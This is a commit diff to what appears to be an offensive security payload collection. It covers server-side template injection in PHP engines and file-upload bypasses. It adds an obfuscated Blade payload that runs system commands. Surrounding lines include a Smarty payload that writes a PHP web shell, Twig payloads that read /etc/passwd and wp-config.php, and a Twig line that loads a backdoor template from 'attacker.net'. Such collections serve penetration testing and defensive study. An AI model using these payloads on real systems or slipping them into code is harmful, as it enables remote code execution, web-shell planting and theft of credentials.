Syntax Highlighting SSTI

2025-12-05 20:40:04 -08:00 · 2025-11-15 17:11:42 +01:00
parent 5c0ee4c6d9
commit 832b54fd95
4 changed files with 30 additions and 13 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -38,6 +38,7 @@
 - [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility
 - [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations
 - [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs
+- [dolevf/graphw00f](https://github.com/dolevf/graphw00f) - GraphQL Server Engine Fingerprinting utility
 - [IvanGoncharov/graphql-voyager](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph
 - [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client

--- a/Injection/PHP.md
+++ b/Injection/PHP.md
@@ -21,21 +21,34 @@

 ## Templating Libraries

-| Template Name  | Payload Format |
-| -------------- | --------- |
-| Laravel Blade  | `{{ }}`   |
-| Latte          | `{var $X=""}{$X}`   |
-| Mustache       | `{{ }}`   |
-| Plates         | `<?= ?>`  |
-| Smarty         | `{ }`     |
-| Twig           | `{{ }}`   |
+| Template Name   | Payload Format |
+| --------------- | --------- |
+| Blade (Laravel) | `{{ }}`   |
+| Latte           | `{var $X=""}{$X}`   |
+| Mustache        | `{{ }}`   |
+| Plates          | `<?= ?>`  |
+| Smarty          | `{ }`     |
+| Twig            | `{{ }}`   |
+
+## Blade
+
+[Official website](https://laravel.com/docs/master/blade)
+> Blade is the simple, yet powerful templating engine that is included with Laravel.
+
+The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr(114),[105,100]))}}`.
+
+```php
+{{passthru(implode(null,array_map(chr(99).chr(104).chr(114),[105,100])))}}
+```
+
+---

 ## Smarty

 [Official website](https://www.smarty.net/docs/en/)
 > Smarty is a template engine for PHP.

-```python
+```php
 {$smarty.version}
 {php}echo `id`;{/php} //deprecated in smarty v3
 {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
@@ -52,7 +65,7 @@

 ### Twig - Basic Injection

-```python
+```php
 {{7*7}}
 {{7*'7'}} would result in 49
 {{dump(app)}}
@@ -62,7 +75,7 @@

 ### Twig - Template Format

-```python
+```php
 $output = $twig > render (
  'Dear' . $_GET['custom_greeting'],
  array("first_name" => $user.first_name)
@@ -76,14 +89,14 @@ $output = $twig > render (

 ### Twig - Arbitrary File Reading

-```python
+```php
 "{{'/etc/passwd'|file_excerpt(1,30)}}"@
 {{include("wp-config.php")}}
 ```

 ### Twig - Code Execution

-```python
+```php
 {{self}}
 {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
@@ -249,4 +262,5 @@ layout template:

 ## References

+- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere- YesWeHack - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
 - [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58)
--- a/Injection/Python.md
+++ b/Injection/Python.md
@@ -406,3 +406,4 @@ PoC :
 - [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
 - [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/)
 - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
+- [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits)
--- a/Files/README.md
+++ b/Files/README.md
@@ -102,6 +102,7 @@ Other extensions that can be abused to trigger other vulnerabilities.
    * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
    * Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp`
    * Multiple special characters: `file.jsp/././././.`
+    * UTF8 filename: `Content-Disposition: form-data; name="anyBodyParam"; filename*=UTF8''myfile%0a.txt`

 * On Windows OS, `include`, `require` and `require_once` functions will convert "foo.php" followed by one or more of the chars `\x20` ( ), `\x22` ("), `\x2E` (.), `\x3C` (<), `\x3E` (>) back to "foo.php".
 * On Windows OS, `fopen` function will convert "foo.php" followed by one or more of the chars `\x2E` (.), `\x2F` (/), `\x5C` (\) back to "foo.php".